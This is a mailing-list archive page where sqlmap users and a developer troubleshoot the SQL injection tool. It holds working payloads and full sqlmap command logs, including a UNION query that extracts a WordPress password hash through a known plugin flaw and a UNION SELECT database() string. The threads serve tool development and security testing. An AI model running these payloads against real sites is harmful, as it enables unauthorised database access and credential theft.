--headers='Accept: application/json' is wrongly handled by Python :) For some strange reason, it messes the sys.argv when there is a whitespace inside a single-quote formation: python -c "import sys; print sys.argv" --dummy="foo: bar" ['-c', '--dummy=foo: bar'] python -c "import sys; print sys.argv" --dummy='foo: bar' ['-c', "--dummy='foo:", "bar'"] Bye On Mon, Feb 2, 2015 at 6:33 PM, Miroslav Stampar <mir...@gm... > wrote: > I'll take a look in couple of hours and let you know. > > Bye > On Feb 1, 2015 4:27 PM, "Brandon Perry" <bpe...@gm...> wrote: > >> Hello! >> >> I am attempting to override the Accept header with Accept: >> application/json (currently is text/html). >> >> When I use -r, I don't have a problem, but wanting to specify a single >> command instead of command + request to reproduce. Using --headers='Accept: >> application/json' doesn't override the default Accept: text/html. Is this >> intended behavior? >> >> Thanks >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> >> >> ------------------------------------------------------------------------------ >> Dive into the World of Parallel Programming. The Go Parallel Website, >> sponsored by Intel and developed in partnership with Slashdot Media, is >> your >> hub for all things parallel software development, from weekly thought >> leadership blogs to news, videos, case studies, tutorials and more. Take a >> look and join the conversation now. http://goparallel.sourceforge.net/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2015-02-02 17:33:46
|
I'll take a look in couple of hours and let you know. Bye On Feb 1, 2015 4:27 PM, "Brandon Perry" <bpe...@gm...> wrote: > Hello! > > I am attempting to override the Accept header with Accept: > application/json (currently is text/html). > > When I use -r, I don't have a problem, but wanting to specify a single > command instead of command + request to reproduce. Using --headers='Accept: > application/json' doesn't override the default Accept: text/html. Is this > intended behavior? > > Thanks > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming. The Go Parallel Website, > sponsored by Intel and developed in partnership with Slashdot Media, is > your > hub for all things parallel software development, from weekly thought > leadership blogs to news, videos, case studies, tutorials and more. Take a > look and join the conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Brandon P. <bpe...@gm...> - 2015-02-01 15:26:39
|
Hello! I am attempting to override the Accept header with Accept: application/json (currently is text/html). When I use -r, I don't have a problem, but wanting to specify a single command instead of command + request to reproduce. Using --headers='Accept: application/json' doesn't override the default Accept: text/html. Is this intended behavior? Thanks -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: sad f. <sad...@ma...> - 2015-01-29 09:23:37
|
<html><head></head><body><div style="font-family: Verdana;font-size: 12.0px;"><div style="font-family: Verdana;font-size: 12.0px;"> <div>Hi!</div> <div>Thanks for the greatest tool!</div> <div>I've found some problem in latest revision of sqlmap.</div> <div>If you will run something like:</div> <div><em>sqlmap.py -u "<a href="http://www.google.com/news.php?id=5+OR+(4=4" target="_blank">http://www.google.com/news.php?id=5+OR+(4=4</a>)" --skip-urlencode --random-agent --tamper=space2plus --technique=BSU -v 3 --dbms=mssql</em></div> <div>And answer 'y' here:</div> <div><em>[09:16:17] [WARNING] it appears that you have provided tainted parameter values ('id=5 OR (4=4)') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly<br/> are you really sure that you want to continue (sqlmap could have problems)? [y/N]</em></div> <div>You'll get some output encoding problem:</div> <div> <div><em>[Gw:bM:bw] [dLf4Q] ScuX1KRmE PXuhmWgc 'BBB.EXXE1c.jXg'<br/> [Gw:bM:NG] [T830] hcuhRmE jXmmcjhRXm hX hPc hWSEch 4yt<br/> [Gw:bM:Nb] [dLf4Q] icj1WSci BcA sWEc jPWSuch '9hI-2'<br/> [Gw:bM:Nb] [dLf4Q] EXh Hppo cSSXS jXic: FGG (fWi ycx9cuh)<br/> [Gw:bM:Nb] [Zry8T8Q] hPc BcA ucSKcS ScusXmici BRhP Wm Hppo cSSXS jXic (FGG) BPRjP jX91i RmhcSIcSc BRhP hPc Scu91hu XI hPc hcuhu</em></div> <div> </div> <div>Printscreen attached.</div> <div>In older versions(tested on something like november 2014 version) there is no such a problem.</div> <div> </div> <div>And also:</div> <div>checkWAF() function now calling every time you run sqlmap. But you really don't need that. Because of this in case there is WAF you'll get timeout every time you run sqlmap on the same target or may even get ip-ban.</div> <div>I think old variant with --check-waf option is much better.</div> <div> </div> <div>Thank you!</div> <div> </div> </div> </div></div></body></html> |
|
From: Miroslav S. <mir...@gm...> - 2015-01-08 08:01:55
|
Hi.
Sorry, this went to my spam folder :). Thank you for your report. It should
be fixed now (there was indeed a bug involved).
Bye
On Tue, Dec 30, 2014 at 2:26 PM, John Public <jn...@gm...> wrote:
>
> Has anyone had success using the sqlmap direct connection with an mssql db
> recently? It either seems to be broken or I am doing it wrong. Any
> suggestions would be greatly appreciated.
>
> E.g.
>
> ~/sqlmapproject-sqlmap-4f602da# python sqlmap.py -d "mssql://
> sa:weakpassword@192.168.1.133:1433/demo" -v 3 --os=Windows --dbms=mssql
> --dbs
>
> {1.0-dev-nongit-20141230}
>
> [00:06:22] [DEBUG] cleaning up configuration parameters
> [00:06:22] [DEBUG] forcing back-end DBMS operating system to user defined
> value 'Windows'
> [00:06:22] [DEBUG] skipping test for Microsoft SQL Server
> [00:06:22] [DEBUG] skipping test for MySQL
> [00:06:22] [DEBUG] skipping test for Oracle
> [00:06:22] [DEBUG] skipping test for PostgreSQL
> [00:06:22] [DEBUG] skipping test for SQLite
> [00:06:22] [DEBUG] skipping test for Microsoft Access
> [00:06:22] [DEBUG] skipping test for Firebird
> [00:06:22] [DEBUG] skipping test for SAP MaxDB
> [00:06:22] [DEBUG] skipping test for Sybase
> [00:06:22] [DEBUG] skipping test for IBM DB2
> [00:06:22] [DEBUG] skipping test for HSQLDB
> [00:06:22] [CRITICAL] sqlmap was not able to fingerprint the back-end
> database management system. Support for this DBMS will be implemented at
> some point
>
>
> --
> jnqpblc
>
>
>
> ------------------------------------------------------------------------------
> Dive into the World of Parallel Programming! The Go Parallel Website,
> sponsored by Intel and developed in partnership with Slashdot Media, is
> your
> hub for all things parallel software development, from weekly thought
> leadership blogs to news, videos, case studies, tutorials and more. Take a
> look and join the conversation now. http://goparallel.sourceforge.net
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
|
|
From: John P. <jn...@gm...> - 2014-12-30 13:26:10
|
Has anyone had success using the sqlmap direct connection with an mssql db
recently? It either seems to be broken or I am doing it wrong. Any
suggestions would be greatly appreciated.
E.g.
~/sqlmapproject-sqlmap-4f602da# python sqlmap.py -d "mssql://
sa:weakpassword@192.168.1.133:1433/demo" -v 3 --os=Windows --dbms=mssql
--dbs
{1.0-dev-nongit-20141230}
[00:06:22] [DEBUG] cleaning up configuration parameters
[00:06:22] [DEBUG] forcing back-end DBMS operating system to user defined
value 'Windows'
[00:06:22] [DEBUG] skipping test for Microsoft SQL Server
[00:06:22] [DEBUG] skipping test for MySQL
[00:06:22] [DEBUG] skipping test for Oracle
[00:06:22] [DEBUG] skipping test for PostgreSQL
[00:06:22] [DEBUG] skipping test for SQLite
[00:06:22] [DEBUG] skipping test for Microsoft Access
[00:06:22] [DEBUG] skipping test for Firebird
[00:06:22] [DEBUG] skipping test for SAP MaxDB
[00:06:22] [DEBUG] skipping test for Sybase
[00:06:22] [DEBUG] skipping test for IBM DB2
[00:06:22] [DEBUG] skipping test for HSQLDB
[00:06:22] [CRITICAL] sqlmap was not able to fingerprint the back-end
database management system. Support for this DBMS will be implemented at
some point
--
jnqpblc
|
|
From: is2reg<is...@16...> - 2014-12-29 18:05:23
|
thank you, I will try again.
2014-12-30
is2reg
发件人:Brandon Perry <bpe...@gm...>
发送时间:2014-12-29 06:39
主题:Re: [sqlmap-users] I want to use custom payload, but I don't know DIY
收件人:"is2reg"<is...@16...>
抄送:"SqlMap List"<sql...@li...>
Could try —prefix=“where “ although %23 is a hex encoded #.
On Dec 28, 2014, at 12:07 PM, is2reg <is...@16...> wrote:
Hi,
the payload is :
%20where%201=2%20UNION%20SELECT%201,2,3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23
Can't replace "where" with "and", and can't replace "%23" with "#", otherwise the result is incorrect, how can I use this payload with sqlmap ?
Thanks !
2014-12-29
is2reg
------------------------------------------------------------------------------
Dive into the World of Parallel Programming! The Go Parallel Website,
sponsored by Intel and developed in partnership with Slashdot Media, is your
hub for all things parallel software development, from weekly thought
leadership blogs to news, videos, case studies, tutorials and more. Take a
look and join the conversation now. http://goparallel.sourceforge.net_______________________________________________
sqlmap-users mailing list
sql...@li...
https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: Brandon P. <bpe...@gm...> - 2014-12-28 23:35:07
|
Could try —prefix=“where “ although %23 is a hex encoded #. > On Dec 28, 2014, at 12:07 PM, is2reg <is...@16...> wrote: > > Hi, > the payload is : > %20where%201=2%20UNION%20SELECT%201,2,3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23 > > Can't replace "where" with "and", and can't replace "%23" with "#", otherwise the result is incorrect, how can I use this payload with sqlmap ? > Thanks ! > > 2014-12-29 > is2reg > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming! The Go Parallel Website, > sponsored by Intel and developed in partnership with Slashdot Media, is your > hub for all things parallel software development, from weekly thought > leadership blogs to news, videos, case studies, tutorials and more. Take a > look and join the conversation now. http://goparallel.sourceforge.net_______________________________________________ <http://goparallel.sourceforge.net_______________________________________________/> > sqlmap-users mailing list > sql...@li... <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users <https://lists.sourceforge.net/lists/listinfo/sqlmap-users> |
|
From: Brandon P. <bpe...@gm...> - 2014-12-15 21:23:11
|
Yeah, no worries. Was just playing around with it and was surprised sqlmap
didn't find the UNION.
I think what is happening is sqlmap is changing up the value of tray during
the union tests to negative numbers, and it is required to be 'in_deleted'
(but hey, that's what --prefix is for)
Thanks!
On Mon, Dec 15, 2014 at 2:39 PM, Miroslav Stampar <
mir...@gm...> wrote:
>
> Looking into traffic file I don't see "obvious" trails of SQLi. If you are
> satisfied with your findings I won't look any further.
>
> Bye
>
> On Mon, Dec 15, 2014 at 6:55 PM, Brandon Perry <bpe...@gm...>
> wrote:
>>
>> Aha, I got it:
>>
>> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req -o
>> --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt --proxy=
>> http://127.0.0.1:8080 --technique=u --suffix=" LIMIT 1,1#"
>> --prefix='in_deleted ' --level=5 --risk=3 -o _
>> ___ ___| |_____ ___ ___ {1.0-dev-180ede0}
>> |_ -| . | | | .'| . |
>> |___|_ |_|_|_|_|__,| _|
>> |_| |_| http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
>> mutual consent is illegal. It is the end user's responsibility to obey all
>> applicable local, state and federal laws. Developers assume no liability
>> and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 09:54:50
>>
>> [09:54:50] [INFO] parsing HTTP request from '/tmp/req.req'
>> [09:54:50] [INFO] setting file for logging HTTP traffic
>> [09:54:50] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been
>> disabled because of its incompatibility with HTTP(s) proxy
>> [09:54:50] [INFO] testing connection to the target URL
>> [09:54:50] [INFO] heuristics detected web page charset 'ascii'
>> [09:54:50] [WARNING] heuristic (basic) test shows that POST parameter
>> 'tray' might not be injectable
>> [09:54:50] [INFO] testing for SQL injection on POST parameter 'tray'
>> [09:54:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [09:54:51] [WARNING] reflective value(s) found and filtering out
>> [09:54:51] [INFO] testing 'MySQL UNION query (random number) - 1 to 10
>> columns'
>> [09:54:51] [INFO] target URL appears to be UNION injectable with 1 columns
>> [09:54:51] [INFO] POST parameter 'tray' is 'MySQL UNION query (random
>> number) - 1 to 10 columns' injectable
>> POST parameter 'tray' is vulnerable. Do you want to keep testing the
>> others (if any)? [y/N] n
>> sqlmap identified the following injection points with a total of 26
>> HTTP(s) requests:
>> ---
>> Parameter: tray (POST)
>> Type: UNION query
>> Title: MySQL UNION query (random number) - 1 column
>> Payload: action=getMailMessage&tray=in_deleted UNION ALL SELECT
>> CONCAT(0x71786b7171,0x756a6c48694a6a504545,0x71767a6a71) LIMIT 1,1#&mid=1
>> ---
>> [09:55:02] [INFO] testing MySQL
>> [09:55:02] [INFO] confirming MySQL
>> [09:55:03] [INFO] the back-end DBMS is MySQL
>> web server operating system: Linux Ubuntu
>> web application technology: Apache 2.4.7, PHP 5.5.9
>> back-end DBMS: MySQL >= 5.0.0
>> [09:55:03] [INFO] fetched data logged to text files under
>> '/home/bperry/.sqlmap/output/172.31.16.26'
>>
>> [*] shutting down at 09:55:03
>>
>> bperry@ubuntu:~/tools/sqlmap$
>>
>>
>> On Mon, Dec 15, 2014 at 11:46 AM, Brandon Perry <
>> bpe...@gm...> wrote:
>>>
>>> Sorry, one more thing to note, the following command gets very close to
>>> exploiting the injection:
>>>
>>> ./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t
>>> /tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix="
>>> LIMIT 1,1#" --union-char=f --prefix='in_deleted '
>>>
>>> The only problem is that the union-char is 'f', when I was hoping it
>>> would be 0x66. When I capture the request and replace 'f' with 0x66, the
>>> injection works. Looks like ' is a bad char.
>>>
>>> On Mon, Dec 15, 2014 at 11:29 AM, Brandon Perry <
>>> bpe...@gm...> wrote:
>>>>
>>>> Playing with the queries sqlmap sends a bit more:
>>>>
>>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1
>>>>
>>>> This results in a 0 being returned where the password hash was in the
>>>> successful injection:
>>>>
>>>> 1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
>>>> ^ injection result
>>>>
>>>>
>>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361#&mid=1
>>>>
>>>> This payload also results in a 0 being returned, not 'fdsa' as you
>>>> would expect.
>>>>
>>>> However, this payload does return 'fdsa'
>>>>
>>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361 LIMIT
>>>> 1,1#&mid=1
>>>>
>>>> 1[split]fdsa[split]in_deleted UNION ALL SELECT 0x66647361 LIMIT
>>>> 1,1#[split]
>>>>
>>>>
>>>> Hope this helps.
>>>>
>>>>
>>>> On Mon, Dec 15, 2014 at 11:01 AM, Brandon Perry <
>>>> bpe...@gm...> wrote:
>>>>>
>>>>> Here is the console output. Attached is the traffic log in a zip:
>>>>>
>>>>> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5
>>>>> --risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt
>>>>> _
>>>>> ___ ___| |_____ ___ ___ {1.0-dev-180ede0}
>>>>> |_ -| . | | | .'| . |
>>>>> |___|_ |_|_|_|_|__,| _|
>>>>> |_| |_| http://sqlmap.org
>>>>>
>>>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>>>> prior mutual consent is illegal. It is the end user's responsibility to
>>>>> obey all applicable local, state and federal laws. Developers assume no
>>>>> liability and are not responsible for any misuse or damage caused by this
>>>>> program
>>>>>
>>>>> [*] starting at 08:56:27
>>>>>
>>>>> [08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
>>>>> [08:56:27] [INFO] setting file for logging HTTP traffic
>>>>> [08:56:27] [INFO] flushing session file
>>>>> [08:56:27] [INFO] testing connection to the target URL
>>>>> [08:56:27] [INFO] heuristics detected web page charset 'ascii'
>>>>> [08:56:27] [INFO] testing if the target URL is stable. This can take a
>>>>> couple of seconds
>>>>> [08:56:28] [INFO] target URL is stable
>>>>> [08:56:28] [WARNING] heuristic (basic) test shows that POST parameter
>>>>> 'tray' might not be injectable
>>>>> [08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
>>>>> [08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>>>> clause'
>>>>> [08:56:28] [WARNING] reflective value(s) found and filtering out
>>>>> [08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>>>> clause (MySQL comment)'
>>>>> [08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>>>> clause (Generic comment)'
>>>>> [08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>>>> clause'
>>>>> [08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>>>> clause (MySQL comment)'
>>>>> [08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>>>> clause (Generic comment)'
>>>>> [08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING,
>>>>> ORDER BY or GROUP BY clause (RLIKE)'
>>>>> [08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter
>>>>> replace (original value)'
>>>>> [08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter
>>>>> replace (MAKE_SET - original value)'
>>>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter
>>>>> replace (ELT - original value)'
>>>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter
>>>>> replace (bool*int - original value)'
>>>>> [08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind -
>>>>> Parameter replace (original value)'
>>>>> [08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter
>>>>> replace (original value)'
>>>>> [08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and
>>>>> ORDER BY clauses'
>>>>> [08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and
>>>>> ORDER BY clauses (original value)'
>>>>> [08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY
>>>>> and ORDER BY clauses'
>>>>> [08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY
>>>>> and ORDER BY clauses'
>>>>> [08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
>>>>> HAVING clause'
>>>>> [08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or
>>>>> HAVING clause (EXTRACTVALUE)'
>>>>> [08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or
>>>>> HAVING clause (UPDATEXML)'
>>>>> [08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or
>>>>> HAVING clause (BIGINT UNSIGNED)'
>>>>> [08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or
>>>>> HAVING clause'
>>>>> [08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or
>>>>> HAVING clause'
>>>>> [08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or
>>>>> HAVING clause (EXTRACTVALUE)'
>>>>> [08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or
>>>>> HAVING clause (UPDATEXML)'
>>>>> [08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or
>>>>> HAVING clause (BIGINT UNSIGNED)'
>>>>> [08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or
>>>>> HAVING clause'
>>>>> [08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING
>>>>> clause'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter
>>>>> replace'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter
>>>>> replace (EXTRACTVALUE)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter
>>>>> replace (UPDATEXML)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter
>>>>> replace (BIGINT UNSIGNED)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and
>>>>> ORDER BY clauses'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and
>>>>> ORDER BY clauses (EXTRACTVALUE)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and
>>>>> ORDER BY clauses (UPDATEXML)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and
>>>>> ORDER BY clauses (BIGINT UNSIGNED)'
>>>>> [08:58:08] [INFO] testing 'MySQL inline queries'
>>>>> [08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>>>>> [08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy
>>>>> query)'
>>>>> [08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>>>>> [08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind
>>>>> (comment)'
>>>>> [08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy
>>>>> query)'
>>>>> [08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12
>>>>> AND time-based blind (heavy query)' injectable
>>>>> [08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
>>>>> [08:58:26] [INFO] automatically extending ranges for UNION query
>>>>> injection technique tests as there is at least one other (potential)
>>>>> technique found
>>>>> [08:58:28] [INFO] target URL appears to be UNION injectable with 1
>>>>> columns
>>>>> [08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20
>>>>> columns'
>>>>> [08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
>>>>> [08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to
>>>>> 40 columns'
>>>>> [08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
>>>>> [08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to
>>>>> 60 columns'
>>>>> [08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
>>>>> [08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to
>>>>> 80 columns'
>>>>> [08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100
>>>>> columns'
>>>>> [08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to
>>>>> 100 columns'
>>>>> [08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20
>>>>> columns'
>>>>> [08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to
>>>>> 20 columns'
>>>>> [08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40
>>>>> columns'
>>>>> [08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to
>>>>> 40 columns'
>>>>> [08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60
>>>>> columns'
>>>>> [08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to
>>>>> 60 columns'
>>>>> [08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80
>>>>> columns'
>>>>> [08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to
>>>>> 80 columns'
>>>>> [08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100
>>>>> columns'
>>>>> [08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to
>>>>> 100 columns'
>>>>> [08:58:54] [INFO] checking if the injection point on POST parameter
>>>>> 'tray' is a false positive
>>>>> POST parameter 'tray' is vulnerable. Do you want to keep testing the
>>>>> others (if any)? [y/N] n
>>>>> sqlmap identified the following injection points with a total of 2049
>>>>> HTTP(s) requests:
>>>>> ---
>>>>> Parameter: tray (POST)
>>>>> Type: AND/OR time-based blind
>>>>> Title: MySQL < 5.0.12 AND time-based blind (heavy query)
>>>>> Payload: action=getMailMessage&tray=in_deleted AND
>>>>> 9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1
>>>>> ---
>>>>> [08:59:48] [INFO] testing MySQL
>>>>> [08:59:48] [WARNING] it is very important not to stress the network
>>>>> adapter during usage of time-based payloads to prevent potential errors
>>>>> do you want sqlmap to try to optimize value(s) for DBMS delay
>>>>> responses (option '--time-sec')? [Y/n]
>>>>> [08:59:51] [INFO] confirming MySQL
>>>>> [08:59:53] [INFO] adjusting time delay to 1 second due to good
>>>>> response times
>>>>> [08:59:53] [INFO] the back-end DBMS is MySQL
>>>>> web server operating system: Linux Ubuntu
>>>>> web application technology: Apache 2.4.7, PHP 5.5.9
>>>>> back-end DBMS: MySQL >= 5.0.0
>>>>> [08:59:53] [INFO] fetched data logged to text files under
>>>>> '/home/bperry/.sqlmap/output/172.31.16.26'
>>>>>
>>>>> [*] shutting down at 08:59:53
>>>>>
>>>>> bperry@ubuntu:~/tools/sqlmap$
>>>>>
>>>>> On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar <
>>>>> mir...@gm...> wrote:
>>>>>>
>>>>>> Hi.
>>>>>>
>>>>>> I don't see a reason why this form of UNION test would be any
>>>>>> different than the regular used by sqlmap. Can you please send me the
>>>>>> traffic file for such run (... --flush-session -t traffic.txt) along with
>>>>>> console output?
>>>>>>
>>>>>> Bye
>>>>>> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...>
>>>>>> wrote:
>>>>>>
>>>>>>> Hello!
>>>>>>>
>>>>>>> Playing around with the following vulnerabivlity:
>>>>>>>
>>>>>>> http://www.exploit-db.com/exploits/35505/
>>>>>>>
>>>>>>>
>>>>>>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1
>>>>>>> UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1'
>>>>>>> does result in a response from the server with the hash of the first user:
>>>>>>>
>>>>>>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1
>>>>>>> UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>>>>>>
>>>>>>>
>>>>>>> However, sqlmap only finds a time based injection. Looking at sqlmap
>>>>>>> through burp, I do see sqlmap doesn't try an injection syntax like the one
>>>>>>> used in the PoC. It may be useful to add a syntax of UNION (SELECT
>>>>>>> CONCAT(blah, blah, blah) FROM blah).
>>>>>>>
>>>>>>> Just a thought!
>>>>>>>
>>>>>>>
>>>>>>> --
>>>>>>> http://volatile-minds.blogspot.com -- blog
>>>>>>> http://www.volatileminds.net -- website
>>>>>>>
>>>>>>>
>>>>>>> ------------------------------------------------------------------------------
>>>>>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>>>>>>> from Actuate! Instantly Supercharge Your Business Reports and
>>>>>>> Dashboards
>>>>>>> with Interactivity, Sharing, Native Excel Exports, App Integration &
>>>>>>> more
>>>>>>> Get technology previously reserved for billion-dollar corporations,
>>>>>>> FREE
>>>>>>>
>>>>>>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>>>>>>> _______________________________________________
>>>>>>> sqlmap-users mailing list
>>>>>>> sql...@li...
>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>
>>>>>>>
>>>>>
>>>>> --
>>>>> http://volatile-minds.blogspot.com -- blog
>>>>> http://www.volatileminds.net -- website
>>>>>
>>>>
>>>>
>>>> --
>>>> http://volatile-minds.blogspot.com -- blog
>>>> http://www.volatileminds.net -- website
>>>>
>>>
>>>
>>> --
>>> http://volatile-minds.blogspot.com -- blog
>>> http://www.volatileminds.net -- website
>>>
>>
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
|
|
From: Miroslav S. <mir...@gm...> - 2014-12-15 20:39:33
|
Looking into traffic file I don't see "obvious" trails of SQLi. If you are
satisfied with your findings I won't look any further.
Bye
On Mon, Dec 15, 2014 at 6:55 PM, Brandon Perry <bpe...@gm...>
wrote:
>
> Aha, I got it:
>
> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req -o --dbms=mysql
> -p tray --flush-session -t /tmp/traffic.txt --proxy=http://127.0.0.1:8080
> --technique=u --suffix=" LIMIT 1,1#" --prefix='in_deleted ' --level=5
> --risk=3 -o _
> ___ ___| |_____ ___ ___ {1.0-dev-180ede0}
> |_ -| . | | | .'| . |
> |___|_ |_|_|_|_|__,| _|
> |_| |_| http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 09:54:50
>
> [09:54:50] [INFO] parsing HTTP request from '/tmp/req.req'
> [09:54:50] [INFO] setting file for logging HTTP traffic
> [09:54:50] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been
> disabled because of its incompatibility with HTTP(s) proxy
> [09:54:50] [INFO] testing connection to the target URL
> [09:54:50] [INFO] heuristics detected web page charset 'ascii'
> [09:54:50] [WARNING] heuristic (basic) test shows that POST parameter
> 'tray' might not be injectable
> [09:54:50] [INFO] testing for SQL injection on POST parameter 'tray'
> [09:54:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
> [09:54:51] [WARNING] reflective value(s) found and filtering out
> [09:54:51] [INFO] testing 'MySQL UNION query (random number) - 1 to 10
> columns'
> [09:54:51] [INFO] target URL appears to be UNION injectable with 1 columns
> [09:54:51] [INFO] POST parameter 'tray' is 'MySQL UNION query (random
